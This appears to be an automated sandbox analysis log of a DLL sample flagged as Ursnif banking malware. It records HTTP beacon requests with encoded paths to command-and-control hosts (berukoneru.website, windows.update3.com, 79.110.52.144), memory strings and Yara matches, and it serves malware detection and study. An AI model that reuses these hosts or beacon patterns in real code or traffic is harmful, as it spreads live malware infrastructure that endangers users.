Source: global traffic | HTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown | Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
Source: 6.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 6.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: 6.dllString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
            Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.337960981.0000000003382000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316290862.0000000003383000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.397630801.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400300965.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400801988.000001497A51A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: 6.dllString found in binary or memory: http://crl.globalsign.net/root.crl0
            Source: 6.dllString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: 6.dllString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: 6.dllString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: 6.dllString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: 6.dllString found in binary or memory: http://ocsp.digicert.com0C
            Source: 6.dllString found in binary or memory: http://ocsp.digicert.com0N
            Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: 6.dllString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
            Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmpString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
            Source: loaddll32.exe, 00000000.00000003.317624845.0000000001398000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316267329.00000000033D1000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.316701420.00000000008F1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/MicrosoftEdgeDownload&quot;
            Source: rundll32.exe, 00000004.00000003.338607112.0000000000FF3000.00000004.00000001.sdmpString found in binary or memory: https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html
            Source: rundll32.exe, 00000003.00000003.364039010.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.372813489.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.523369955.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/
            Source: regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/BS
            Source: rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmpString found in binary or memory: https://berukoneru.website/LAp
            Source: rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/O
            Source: regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/j
            Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363514151.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/jP
            Source: regsvr32.exe, 00000002.00000003.362160768.00000000033C0000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on
            Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY
            Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP7
            Source: loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCA
            Source: regsvr32.exe, 00000002.00000003.362615512.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65
            Source: regsvr32.exe, 00000002.00000003.372829342.000000000335B000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL
            Source: rundll32.exe, 00000003.00000003.362882057.00000000008D7000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tyi
            Source: rundll32.exe, 00000004.00000003.372839349.0000000000FF2000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6
            Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ
            Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax&quot;
            Source: 6.dllString found in binary or memory: https://nodejs.org0
            Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmpString found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
            Source: regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/
            Source: regsvr32.exe, 00000002.00000003.361178760.000000000335B000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZv
            Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT
            Source: 6.dllString found in binary or memory: https://www.digicert.com/CPS0
            Source: 6.dllString found in binary or memory: https://www.globalsign.com/repository/0
            Source: 6.dllString found in binary or memory: https://www.globalsign.com/repository/03
            Source: unknownDNS traffic detected: queries for: windows.update3.com
            Source: global trafficHTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
            Source: Yara matchFile source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
